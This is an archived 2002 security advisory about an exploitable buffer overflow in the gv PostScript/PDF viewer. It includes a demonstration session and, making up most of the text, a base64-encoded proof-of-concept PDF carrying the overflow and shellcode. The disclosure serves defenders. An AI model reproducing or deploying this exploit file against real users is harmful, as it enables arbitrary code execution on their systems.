Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps A-M :: lnx5714.htm

Ghostview Exploitable Buffer Overflow



27th Sep 2002 [SBWID-5714]
COMMAND

	Exploitable Buffer Overflow in gv

SYSTEMS AFFECTED

	This vulnerability affects the latest version of gv, 3.5.8.  An  exploit
	has been tested on Red Hat Linux 7.3.

PROBLEM

	An   issue   exclusively   disclosed   to    iDEFENSE    by    zen-parse
	[zen-parse@gmx.net], iDEFENSE Security Advisory [09.26.2002] :
	

	--snipp--
	

	In order to perform exploitation, an attacker  would  have  to  trick  a
	user into viewing a malformed PDF or PostScript file  from  the  command
	line. This may be somewhat easier for Unix  based  email  programs  that
	associate gv with email attachments. Since gv is not normally  installed
	setuid root, an attacker would only be able to cause arbitrary  code  to
	run with the privileges  of  that  user.  Other  programs  that  utilize
	derivatives of gv, such as ggv or kghostview, may also be vulnerable  in
	similiar ways.
	

	A proof of concept exploit for Red Hat Linux designed  by  zen-parse  is
	attached to this message. It packages the overflow and shellcode in  the
	"%%PageOrder:" section of the PDF.
	

	[root@victim]# ls -al /tmp/itworked 

	/bin/ls: /tmp/itworked: No such file or directory 

	[root@victim]# gv gv-exploit.pdf 

	[root@victim]# ls -al /tmp/itworked 

	- -rw-r--r-- 1 root root 0 Aug 22 16:50 /tmp/itworked

	[root@victim]# 

	

	

	--snapp--
	

	--54265557

	Content-Type: application/pdf; name="gv-exploit.pdf"

	Content-Transfer-Encoding: Base64

	Content-Disposition: attachment; filename="gv-exploit.pdf"

	

	JSFQUy1BZG9iZS0zLjANCiUlQ3JlYXRvcjogZ3JvZmYgMS4xNiAod2l0aCBtb2RpZmljYXRpb25z

	IGJ5IHplbi1wYXJzZSBieSBoYW5kIDEuMDBhKQ0KJSVDcmVhdGlvbkRhdGU6IFNhdCBKdW4gMTUg

	MTU6MzBpc2gNCiUlUGFnZU9yZGVyOiBBQUFBQUFBQUFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFC

	Q0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJD

	REFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNE

	QUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RB

	QkNEYWFhYWJiYmJjY2NjZGRkZGVlZWVmZmZmZ2dnZ2hoaGhpaWlpampqamtra2tsbGxsbW1tbW5u

	bm5vb29vcHBwcHFxcXFycnJyc3Nzc3R0dHR1dXV1dnZ2dnd3d3eg8v+/QEBAQEBAQEBAQEBAQEBA

	QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA

	QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA

	QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA

	QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA

	QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA

	QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA

	QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA

	QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA

	QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA

	QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA

	QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA

	QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA

	QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA

	QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAvPz//78xwGgv

	L3NoaC9iaW6J41BoLy9zaGgvYmluieFQaC1wcGOJ5lBocmtlZGhpdHdvaHRtcC9oRlN9L2hoJHtJ

	aHRvdWOJ4lBSVlFUWVBUWrAhSEhISEhISEhISEhISEhISEhISEhISM2ADQolJUVuZENvbW1lbnRz

	DQolJUVPRg0K

	

	--54265557--

	

SOLUTION

	No patch, change viewer ?


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH